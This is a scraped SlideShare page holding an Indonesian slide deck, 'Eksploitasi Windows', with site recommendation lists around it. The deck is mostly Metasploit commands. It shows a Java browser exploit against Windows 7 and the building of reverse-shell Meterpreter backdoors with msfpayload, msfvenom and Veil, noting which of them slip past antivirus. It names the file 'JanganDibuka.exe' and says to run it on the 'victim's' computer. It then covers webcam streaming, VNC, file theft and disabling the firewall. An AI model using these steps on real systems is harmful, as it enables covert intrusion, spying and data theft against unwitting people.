SlideShare a Scribd company logo

Eksploitasi Windows

K
Kimzu Zaenal

exploit windows

Internet
1 of 12
Download to read offline
ZAENAL ABIDIN Exploit windows Sebelum melulai exploit Jalankan service metasploit - Applications => Kali Linux => System services => Metasploit => Comunity / pro start Untuk menjalankan Metasploit freamwork - Applications => Kali linux => Exploitation tools => Metasploit => Metasploit freamwork Menjalankan metasploit melalui terminal - bukan terminal ketik msfconsole Exploit windows mengunakan java applet - ketik: use exploit/multi/browser/java_jre17_provider_skeleton Tekan enter - ketik: set payload java/Meterpreter/reverse_tcp Tekan enter - ketik: set lhost (ketik ip komputer yang kamu gunakan) Tekan enter - ketik: set srvhost (ketik ip kamputer yang kamu gunakan)
ZAENAL ABIDIN Tekan enter - ketik: set uripath / Tekan enter - exploit tekan enter Di komputer korban buka browser dan ketik alamat website: http://172.16.204.1:8080/ Alamat website di dapat dari: USING URL: http://172.16.204.1:8080/ Sudah berhasil masuk ke os windows7 Exploit windows menggunakan Backdoor Banyak cara untuk membuat backdoor Bisa menggunakan setoolkit, msfpayload, msfvenom, veil dll.
ZAENAL ABIDIN Menggunakan msfpayload - buka terminal kemudian ketik kode di bawah ini: msfpayload windows/meterpreter/reverse_tcp lhost=172.16.204.1 lport=4444 x > /root/JanganDibuka.exe Ket: Lhost = ip komputer yang kamu gunakan Lport = isi dengan port 4444 /root = letak backdoor yang sudah jadi JanganDibuka = filenema backdoor yang akan di buat Menggunakan msfvenom - buka teminal ketik kode di bawah ini: msfvenom -p windows/meterpreter/reverse_tcp - o Ketik di bawah ini untuk membuat backdoor msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' lhost=172.16.204.1 lport=4444 -f exe>/root/JanganDibuka.exe Menggunakan veil Sebelum menggunakan veil
ZAENAL ABIDIN Install dulu tool veil - buka terminal ketik wget https://github.com/ChrisTruncer/Veil/archive/master.zip - Kemudian extrak menggunakan perintah unzip master.zip - install veil: /root/Veil-Evasion-master/setup/setup.sh Membuat backdoor - masuk terminal kerik /root/Veil-Evasion-master/Veil-Evasion.py - ketik use Ketik 25
ZAENAL ABIDIN Ketik generate Ketik 1 Tekan enter ketik ip komputer yang kamu gunakan Ketik port 4444
ZAENAL ABIDIN Tekan enter Ketik nama backdoor yang akan dibuat Ketik 1 Letak backdoor yang suka jadi di : /root/veil-output/compiled/JanganDibuka.exe Di atas sudah ada beberapa contoh membuat backdoor Kalau menggunakan backdoor : - msfpayload = mudah terdeteksi antivirus
ZAENAL ABIDIN - msfvenom = bisa lolos dari antivirus - veil = bisa lolos dari antivirus Menggunakan Backdoor - buka terminal ketik: Msfconsole Ketik : use exploit/multi/handler Tekan enter Ketik : set payload windows/meterpreter/reverse_tcp Tekan enter Ketik : set lhost (ip komputer yang kamu gunakan) Tekan enter Ketik : set lport (port nya samakan dengan port backdoor yang kamu telah buat) Tekan enter Ketik : exploit Tekan enter Copy dan jalankan backdoor di komputer korban
ZAENAL ABIDIN Ketik help : mengetahui perintah meterpreter Berhasil masuk ke windows7
ZAENAL ABIDIN
ZAENAL ABIDIN Ketik shell untuk masuk cmd windows7 Ketik exit : keluar dari cmd Ketik screenshot : sreenshot windows7 Ketik webcam_stream : menjalankan webcam komputer korban
ZAENAL ABIDIN Ketik run vnc : remote komputer korban Untuk mengambil file dari komputer korban Ketik download lokasi file korban Contoh: download c:wallpaper.jpg
ZAENAL ABIDIN Untuk menaruh file ke komputer korban Ketik upload file yang akan ditaruh di komputer korban Contoh: upload gambar.jpg c: Untuk disable firewall windows Ketik: netsh firewall set opmode disable

Recommended

Cara mengatasi rotation error on acer one 10
Cara mengatasi rotation error on acer one 10Cara mengatasi rotation error on acer one 10
Cara mengatasi rotation error on acer one 10amin maghfuri
 
Routing dan proxy debian
Routing dan proxy debianRouting dan proxy debian
Routing dan proxy debianArga Prahara
 
Setting FTP, SSH, NsLookup di linux
Setting FTP, SSH, NsLookup di linuxSetting FTP, SSH, NsLookup di linux
Setting FTP, SSH, NsLookup di linuxRobby Firmansyah
 
Tutorial setting tere menggunakan squid proxy by luthfan
Tutorial setting tere menggunakan squid proxy by luthfanTutorial setting tere menggunakan squid proxy by luthfan
Tutorial setting tere menggunakan squid proxy by luthfanSafrut Trezeguet
 
Materi untuk ujian praktek tkj tahun 2013
Materi untuk ujian praktek tkj tahun 2013Materi untuk ujian praktek tkj tahun 2013
Materi untuk ujian praktek tkj tahun 2013Dede Irawan
 
Assessment windows xp
Assessment windows xpAssessment windows xp
Assessment windows xpOptima Mijatovic
 
Cara manghilangkan virus recycler
Cara manghilangkan virus recyclerCara manghilangkan virus recycler
Cara manghilangkan virus recyclerardi_one
 
Basic metasploit
Basic metasploitBasic metasploit
Basic metasploitClound Carbelius
 

Recommended

Cara mengatasi rotation error on acer one 10
Cara mengatasi rotation error on acer one 10Cara mengatasi rotation error on acer one 10
Cara mengatasi rotation error on acer one 10amin maghfuri
 
Routing dan proxy debian
Routing dan proxy debianRouting dan proxy debian
Routing dan proxy debianArga Prahara
 
Setting FTP, SSH, NsLookup di linux
Setting FTP, SSH, NsLookup di linuxSetting FTP, SSH, NsLookup di linux
Setting FTP, SSH, NsLookup di linuxRobby Firmansyah
 
Tutorial setting tere menggunakan squid proxy by luthfan
Tutorial setting tere menggunakan squid proxy by luthfanTutorial setting tere menggunakan squid proxy by luthfan
Tutorial setting tere menggunakan squid proxy by luthfanSafrut Trezeguet
 
Materi untuk ujian praktek tkj tahun 2013
Materi untuk ujian praktek tkj tahun 2013Materi untuk ujian praktek tkj tahun 2013
Materi untuk ujian praktek tkj tahun 2013Dede Irawan
 
Assessment windows xp
Assessment windows xpAssessment windows xp
Assessment windows xpOptima Mijatovic
 
Cara manghilangkan virus recycler
Cara manghilangkan virus recyclerCara manghilangkan virus recycler
Cara manghilangkan virus recyclerardi_one
 
Basic metasploit
Basic metasploitBasic metasploit
Basic metasploitClound Carbelius
 
Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6Yayan R. Wijaya
 
Firewall
FirewallFirewall
Firewallrizqi_hendrian
 
tutorial snort and nessus
tutorial snort and nessustutorial snort and nessus
tutorial snort and nessusIT-Networking
 
Belajar bikin vps dengan centos
Belajar bikin vps dengan centosBelajar bikin vps dengan centos
Belajar bikin vps dengan centosAinur Rochim
 
Tutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan IntranetTutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan IntranetRido Ridho
 
Repository lokal zorin linux
Repository lokal zorin linuxRepository lokal zorin linux
Repository lokal zorin linuxUtami Islami
 
APLIKASI
APLIKASIAPLIKASI
APLIKASIAry Ruswanto
 
The impact of innovation on travel and tourism industries (World Travel Marke...
The impact of innovation on travel and tourism industries (World Travel Marke...The impact of innovation on travel and tourism industries (World Travel Marke...
The impact of innovation on travel and tourism industries (World Travel Marke...Brian Solis
 
Presentacion trama
Presentacion tramaPresentacion trama
Presentacion tramacristinaheredia
 
Agile 2016 Raporu
Agile 2016 RaporuAgile 2016 Raporu
Agile 2016 Raporuagileati
 
W9700vaf
W9700vafW9700vaf
W9700vafpsychologist
 
Kenalan Dengan Firebase Android
Kenalan Dengan Firebase AndroidKenalan Dengan Firebase Android
Kenalan Dengan Firebase AndroidAgus Haryanto
 
BBS Flyers 08/2016
BBS Flyers 08/2016BBS Flyers 08/2016
BBS Flyers 08/2016Umut IŞIK
 
Scraping
ScrapingScraping
Scrapingseravb
 
Planning poker in a nutshell
Planning poker in a nutshellPlanning poker in a nutshell
Planning poker in a nutshellSeb Rose
 
2016-12-23 Co-learning Webinar - re-vers-ify
2016-12-23 Co-learning Webinar - re-vers-ify2016-12-23 Co-learning Webinar - re-vers-ify
2016-12-23 Co-learning Webinar - re-vers-ifyGunther Verheyen
 
5 things cucumber is bad at by Richard Lawrence
5 things cucumber is bad at by Richard Lawrence5 things cucumber is bad at by Richard Lawrence
5 things cucumber is bad at by Richard LawrenceSkills Matter
 
Gamification in outsourcing company: experience report.
Gamification in outsourcing company: experience report.Gamification in outsourcing company: experience report.
Gamification in outsourcing company: experience report.Mikalai Alimenkou
 
New Home Inspection Sample Report
New Home Inspection Sample ReportNew Home Inspection Sample Report
New Home Inspection Sample ReportSmartChoice Home & Mold Inspections
 
Innovative transformation of our society conceptual framework anil iciig
Innovative transformation of our society conceptual framework anil iciigInnovative transformation of our society conceptual framework anil iciig
Innovative transformation of our society conceptual framework anil iciigDr Anil Gupta
 
Protecting Data Everywhere - Barracuda
Protecting Data Everywhere - BarracudaProtecting Data Everywhere - Barracuda
Protecting Data Everywhere - BarracudaMarcoTechnologies
 
Designed to Learn
Designed to LearnDesigned to Learn
Designed to LearnMelissa Perri
 

More Related Content

What's hot

Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6Yayan R. Wijaya
 
tutorial snort and nessus
tutorial snort and nessustutorial snort and nessus
tutorial snort and nessusIT-Networking
 
Belajar bikin vps dengan centos
Belajar bikin vps dengan centosBelajar bikin vps dengan centos
Belajar bikin vps dengan centosAinur Rochim
 
Tutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan IntranetTutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan IntranetRido Ridho
 
Repository lokal zorin linux
Repository lokal zorin linuxRepository lokal zorin linux
Repository lokal zorin linuxUtami Islami
 

What's hot (7)

Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6
 
Firewall
FirewallFirewall
Firewall
 
tutorial snort and nessus
tutorial snort and nessustutorial snort and nessus
tutorial snort and nessus
 
Belajar bikin vps dengan centos
Belajar bikin vps dengan centosBelajar bikin vps dengan centos
Belajar bikin vps dengan centos
 
Tutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan IntranetTutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan Intranet
 
Repository lokal zorin linux
Repository lokal zorin linuxRepository lokal zorin linux
Repository lokal zorin linux
 
APLIKASI
APLIKASIAPLIKASI
APLIKASI
 

Viewers also liked

The impact of innovation on travel and tourism industries (World Travel Marke...
The impact of innovation on travel and tourism industries (World Travel Marke...The impact of innovation on travel and tourism industries (World Travel Marke...
The impact of innovation on travel and tourism industries (World Travel Marke...Brian Solis
 
Agile 2016 Raporu
Agile 2016 RaporuAgile 2016 Raporu
Agile 2016 Raporuagileati
 
Kenalan Dengan Firebase Android
Kenalan Dengan Firebase AndroidKenalan Dengan Firebase Android
Kenalan Dengan Firebase AndroidAgus Haryanto
 
BBS Flyers 08/2016
BBS Flyers 08/2016BBS Flyers 08/2016
BBS Flyers 08/2016Umut IŞIK
 
Scraping
ScrapingScraping
Scrapingseravb
 
Planning poker in a nutshell
Planning poker in a nutshellPlanning poker in a nutshell
Planning poker in a nutshellSeb Rose
 
2016-12-23 Co-learning Webinar - re-vers-ify
2016-12-23 Co-learning Webinar - re-vers-ify2016-12-23 Co-learning Webinar - re-vers-ify
2016-12-23 Co-learning Webinar - re-vers-ifyGunther Verheyen
 
5 things cucumber is bad at by Richard Lawrence
5 things cucumber is bad at by Richard Lawrence5 things cucumber is bad at by Richard Lawrence
5 things cucumber is bad at by Richard LawrenceSkills Matter
 
Gamification in outsourcing company: experience report.
Gamification in outsourcing company: experience report.Gamification in outsourcing company: experience report.
Gamification in outsourcing company: experience report.Mikalai Alimenkou
 
Innovative transformation of our society conceptual framework anil iciig
Innovative transformation of our society conceptual framework anil iciigInnovative transformation of our society conceptual framework anil iciig
Innovative transformation of our society conceptual framework anil iciigDr Anil Gupta
 
Protecting Data Everywhere - Barracuda
Protecting Data Everywhere - BarracudaProtecting Data Everywhere - Barracuda
Protecting Data Everywhere - BarracudaMarcoTechnologies
 
Clever Photo Manipulations by Indian Artist Anil Saxena
Clever Photo Manipulations by Indian Artist Anil SaxenaClever Photo Manipulations by Indian Artist Anil Saxena
Clever Photo Manipulations by Indian Artist Anil Saxenamaditabalnco
 
Voxxed days 2015-hakansaglam-codereview
Voxxed days 2015-hakansaglam-codereviewVoxxed days 2015-hakansaglam-codereview
Voxxed days 2015-hakansaglam-codereviewHakan Saglam
 
13 explosive things you should try as an agilist
13 explosive things you should try as an agilist13 explosive things you should try as an agilist
13 explosive things you should try as an agilistPeter Gfader
 
Agile Turkey summit 2014 - Empirical Management explored
Agile Turkey summit 2014 - Empirical Management exploredAgile Turkey summit 2014 - Empirical Management explored
Agile Turkey summit 2014 - Empirical Management exploredGunther Verheyen
 

Viewers also liked (20)

The impact of innovation on travel and tourism industries (World Travel Marke...
The impact of innovation on travel and tourism industries (World Travel Marke...The impact of innovation on travel and tourism industries (World Travel Marke...
The impact of innovation on travel and tourism industries (World Travel Marke...
 
Presentacion trama
Presentacion tramaPresentacion trama
Presentacion trama
 
Agile 2016 Raporu
Agile 2016 RaporuAgile 2016 Raporu
Agile 2016 Raporu
 
W9700vaf
W9700vafW9700vaf
W9700vaf
 
Kenalan Dengan Firebase Android
Kenalan Dengan Firebase AndroidKenalan Dengan Firebase Android
Kenalan Dengan Firebase Android
 
BBS Flyers 08/2016
BBS Flyers 08/2016BBS Flyers 08/2016
BBS Flyers 08/2016
 
Scraping
ScrapingScraping
Scraping
 
Planning poker in a nutshell
Planning poker in a nutshellPlanning poker in a nutshell
Planning poker in a nutshell
 
2016-12-23 Co-learning Webinar - re-vers-ify
2016-12-23 Co-learning Webinar - re-vers-ify2016-12-23 Co-learning Webinar - re-vers-ify
2016-12-23 Co-learning Webinar - re-vers-ify
 
5 things cucumber is bad at by Richard Lawrence
5 things cucumber is bad at by Richard Lawrence5 things cucumber is bad at by Richard Lawrence
5 things cucumber is bad at by Richard Lawrence
 
Gamification in outsourcing company: experience report.
Gamification in outsourcing company: experience report.Gamification in outsourcing company: experience report.
Gamification in outsourcing company: experience report.
 
New Home Inspection Sample Report
New Home Inspection Sample ReportNew Home Inspection Sample Report
New Home Inspection Sample Report
 
Innovative transformation of our society conceptual framework anil iciig
Innovative transformation of our society conceptual framework anil iciigInnovative transformation of our society conceptual framework anil iciig
Innovative transformation of our society conceptual framework anil iciig
 
Protecting Data Everywhere - Barracuda
Protecting Data Everywhere - BarracudaProtecting Data Everywhere - Barracuda
Protecting Data Everywhere - Barracuda
 
Designed to Learn
Designed to LearnDesigned to Learn
Designed to Learn
 
Clever Photo Manipulations by Indian Artist Anil Saxena
Clever Photo Manipulations by Indian Artist Anil SaxenaClever Photo Manipulations by Indian Artist Anil Saxena
Clever Photo Manipulations by Indian Artist Anil Saxena
 
Voxxed days 2015-hakansaglam-codereview
Voxxed days 2015-hakansaglam-codereviewVoxxed days 2015-hakansaglam-codereview
Voxxed days 2015-hakansaglam-codereview
 
Coding Culture
Coding CultureCoding Culture
Coding Culture
 
13 explosive things you should try as an agilist
13 explosive things you should try as an agilist13 explosive things you should try as an agilist
13 explosive things you should try as an agilist
 
Agile Turkey summit 2014 - Empirical Management explored
Agile Turkey summit 2014 - Empirical Management exploredAgile Turkey summit 2014 - Empirical Management explored
Agile Turkey summit 2014 - Empirical Management explored
 

Similar to Eksploitasi Windows

Cara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_digCara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_digiwannazhan
 
Cara instalasi aplikasi perpustakaan digital eprints
Cara instalasi aplikasi perpustakaan digital eprintsCara instalasi aplikasi perpustakaan digital eprints
Cara instalasi aplikasi perpustakaan digital eprintsMiftakhul Yazid Fuadi
 
Administrasi dasar depdiknux
Administrasi dasar depdiknuxAdministrasi dasar depdiknux
Administrasi dasar depdiknuxHARRY CHAN PUTRA
 
Cara menghack warnet yang di protect
Cara menghack warnet yang di protectCara menghack warnet yang di protect
Cara menghack warnet yang di protectRachel Darussalam
 
Bahaya virus net
Bahaya virus netBahaya virus net
Bahaya virus netSandra Reed
 
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018korrymarintansiahaan
 
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5akbarfak
 
Cara install-server-centos
Cara install-server-centosCara install-server-centos
Cara install-server-centosReno Lee
 
Streaming server di linux debian
Streaming server di linux debianStreaming server di linux debian
Streaming server di linux debianadicahyonoputra
 
Modul Pembelajaran Mikrotik
Modul Pembelajaran MikrotikModul Pembelajaran Mikrotik
Modul Pembelajaran MikrotikWandi Pratama
 
Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)steelhearts
 
Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7Cahya Dwiana SN
 
Membangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSSMembangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSSPT. Trinity Auto
 
Instalasi mikrotik-router os
Instalasi mikrotik-router osInstalasi mikrotik-router os
Instalasi mikrotik-router oscabikhosting
 
Aplikasi Linux Ubuntu (Ubuntu Aplication)
Aplikasi Linux Ubuntu (Ubuntu Aplication)Aplikasi Linux Ubuntu (Ubuntu Aplication)
Aplikasi Linux Ubuntu (Ubuntu Aplication)Nur Rahma Aziza
 
Konfigurasi wireles pada debian
Konfigurasi wireles pada debianKonfigurasi wireles pada debian
Konfigurasi wireles pada debiananlehmooneyham
 

Similar to Eksploitasi Windows (20)

Jurnal metasploit(revisi)
Jurnal metasploit(revisi)Jurnal metasploit(revisi)
Jurnal metasploit(revisi)
 
Cara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_digCara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_dig
 
Cara instalasi aplikasi perpustakaan digital eprints
Cara instalasi aplikasi perpustakaan digital eprintsCara instalasi aplikasi perpustakaan digital eprints
Cara instalasi aplikasi perpustakaan digital eprints
 
Administrasi dasar depdiknux
Administrasi dasar depdiknuxAdministrasi dasar depdiknux
Administrasi dasar depdiknux
 
Cara menghack warnet yang di protect
Cara menghack warnet yang di protectCara menghack warnet yang di protect
Cara menghack warnet yang di protect
 
Bahaya virus net
Bahaya virus netBahaya virus net
Bahaya virus net
 
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
 
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
 
Cara install-server-centos
Cara install-server-centosCara install-server-centos
Cara install-server-centos
 
Streaming server di linux debian
Streaming server di linux debianStreaming server di linux debian
Streaming server di linux debian
 
Modul Pembelajaran Mikrotik
Modul Pembelajaran MikrotikModul Pembelajaran Mikrotik
Modul Pembelajaran Mikrotik
 
Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7
 
Membangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSSMembangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSS
 
Trik komputer
Trik komputerTrik komputer
Trik komputer
 
Installasi xampp
Installasi xamppInstallasi xampp
Installasi xampp
 
Instalasi mikrotik-router os
Instalasi mikrotik-router osInstalasi mikrotik-router os
Instalasi mikrotik-router os
 
Aplikasi Linux Ubuntu (Ubuntu Aplication)
Aplikasi Linux Ubuntu (Ubuntu Aplication)Aplikasi Linux Ubuntu (Ubuntu Aplication)
Aplikasi Linux Ubuntu (Ubuntu Aplication)
 
Konfigurasi wireles pada debian
Konfigurasi wireles pada debianKonfigurasi wireles pada debian
Konfigurasi wireles pada debian
 

Eksploitasi Windows

  • 1. ZAENAL ABIDIN Exploit windows Sebelum melulai exploit Jalankan service metasploit - Applications => Kali Linux => System services => Metasploit => Comunity / pro start Untuk menjalankan Metasploit freamwork - Applications => Kali linux => Exploitation tools => Metasploit => Metasploit freamwork Menjalankan metasploit melalui terminal - bukan terminal ketik msfconsole Exploit windows mengunakan java applet - ketik: use exploit/multi/browser/java_jre17_provider_skeleton Tekan enter - ketik: set payload java/Meterpreter/reverse_tcp Tekan enter - ketik: set lhost (ketik ip komputer yang kamu gunakan) Tekan enter - ketik: set srvhost (ketik ip kamputer yang kamu gunakan)
  • 2. ZAENAL ABIDIN Tekan enter - ketik: set uripath / Tekan enter - exploit tekan enter Di komputer korban buka browser dan ketik alamat website: http://172.16.204.1:8080/ Alamat website di dapat dari: USING URL: http://172.16.204.1:8080/ Sudah berhasil masuk ke os windows7 Exploit windows menggunakan Backdoor Banyak cara untuk membuat backdoor Bisa menggunakan setoolkit, msfpayload, msfvenom, veil dll.
  • 3. ZAENAL ABIDIN Menggunakan msfpayload - buka terminal kemudian ketik kode di bawah ini: msfpayload windows/meterpreter/reverse_tcp lhost=172.16.204.1 lport=4444 x > /root/JanganDibuka.exe Ket: Lhost = ip komputer yang kamu gunakan Lport = isi dengan port 4444 /root = letak backdoor yang sudah jadi JanganDibuka = filenema backdoor yang akan di buat Menggunakan msfvenom - buka teminal ketik kode di bawah ini: msfvenom -p windows/meterpreter/reverse_tcp - o Ketik di bawah ini untuk membuat backdoor msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' lhost=172.16.204.1 lport=4444 -f exe>/root/JanganDibuka.exe Menggunakan veil Sebelum menggunakan veil
  • 4. ZAENAL ABIDIN Install dulu tool veil - buka terminal ketik wget https://github.com/ChrisTruncer/Veil/archive/master.zip - Kemudian extrak menggunakan perintah unzip master.zip - install veil: /root/Veil-Evasion-master/setup/setup.sh Membuat backdoor - masuk terminal kerik /root/Veil-Evasion-master/Veil-Evasion.py - ketik use Ketik 25
  • 5. ZAENAL ABIDIN Ketik generate Ketik 1 Tekan enter ketik ip komputer yang kamu gunakan Ketik port 4444
  • 6. ZAENAL ABIDIN Tekan enter Ketik nama backdoor yang akan dibuat Ketik 1 Letak backdoor yang suka jadi di : /root/veil-output/compiled/JanganDibuka.exe Di atas sudah ada beberapa contoh membuat backdoor Kalau menggunakan backdoor : - msfpayload = mudah terdeteksi antivirus
  • 7. ZAENAL ABIDIN - msfvenom = bisa lolos dari antivirus - veil = bisa lolos dari antivirus Menggunakan Backdoor - buka terminal ketik: Msfconsole Ketik : use exploit/multi/handler Tekan enter Ketik : set payload windows/meterpreter/reverse_tcp Tekan enter Ketik : set lhost (ip komputer yang kamu gunakan) Tekan enter Ketik : set lport (port nya samakan dengan port backdoor yang kamu telah buat) Tekan enter Ketik : exploit Tekan enter Copy dan jalankan backdoor di komputer korban
  • 8. ZAENAL ABIDIN Ketik help : mengetahui perintah meterpreter Berhasil masuk ke windows7
  • 10. ZAENAL ABIDIN Ketik shell untuk masuk cmd windows7 Ketik exit : keluar dari cmd Ketik screenshot : sreenshot windows7 Ketik webcam_stream : menjalankan webcam komputer korban
  • 11. ZAENAL ABIDIN Ketik run vnc : remote komputer korban Untuk mengambil file dari komputer korban Ketik download lokasi file korban Contoh: download c:wallpaper.jpg
  • 12. ZAENAL ABIDIN Untuk menaruh file ke komputer korban Ketik upload file yang akan ditaruh di komputer korban Contoh: upload gambar.jpg c: Untuk disable firewall windows Ketik: netsh firewall set opmode disable